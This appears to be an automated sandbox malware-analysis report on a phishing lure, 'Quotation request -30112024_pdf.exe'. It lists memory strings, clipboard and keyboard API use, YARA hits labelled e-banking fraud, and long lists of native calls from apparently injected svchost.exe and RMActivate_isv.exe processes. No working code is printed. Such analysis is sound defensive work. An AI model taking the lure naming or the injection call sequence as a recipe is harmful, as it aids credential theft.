                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Z
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: RMActivate_isv.exe, 0000000B.00000003.1891152849.0000000007ED9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000040A6000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003376000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.0000000028E66000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.bt.cn/?from=404
                Source: RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,2_2_0046DC80
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,2_2_0044C37A
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0047C81C

                E-Banking Fraud

                Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample | Static PE information: Filename: Quotation request -30112024_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042C173 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040A87F NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C74340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C74650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C72C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C73090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C73010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C73D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C73D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03534340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03534650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035335C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035339B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03532CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03533010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03533090 NtSetValueKey
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03533D70 NtOpenThread
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03533D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_02E28EC0 NtCreateFile
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_02E29320 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_02E29030 NtReadFile
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_02E291C0 NtClose
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_02E29120 NtDeleteFile
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_033EF875 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_033EF8D9 NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_004096A0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0042200C
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0041A217
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00412216
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0042435D
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_004033C0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0044F430
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_004125E8
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0044663B
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00413801
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0042096F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_004129D0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_004119E3
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0041C9AE
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0047EA6F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0040FA10
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0044EB5F
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00423C81
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00411E78
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00442E0C
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00420EC0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_0044CF17
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_00444FD2
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe Code function: 2_2_03263678
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00418173
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402869
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402827
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402830
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040FA63
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416370
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416373
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040FC83
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402D40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040DD03
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042E7B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03CB9C32
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BA352
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0350E3F0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035C03E6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035A0274
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035802C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03588158
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0359A118
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034F0100
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B81CC
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035C01AA
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B41A2
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03592000
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03524750
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03500770
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034FC7C0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0351C6E0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03500535
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035C0591
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B2446
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035A4420
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035AE4F6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BAB40
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035B6BD7
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034FEA80
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03516962
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035029A0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035CA9A6
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0350A840
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03502840
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0352E8F0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034E68B8
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03574F40
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03520F30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035A2F30
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03542F28
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034F2FC8
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0350CFE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0357EFA0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03500E59
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BEE26
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BEEDB
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03512E90
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_035BCE93
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0359CD1F
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_0350AD00
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_034FADE0
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03518DBF
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe Code function: 11_2_03500C00
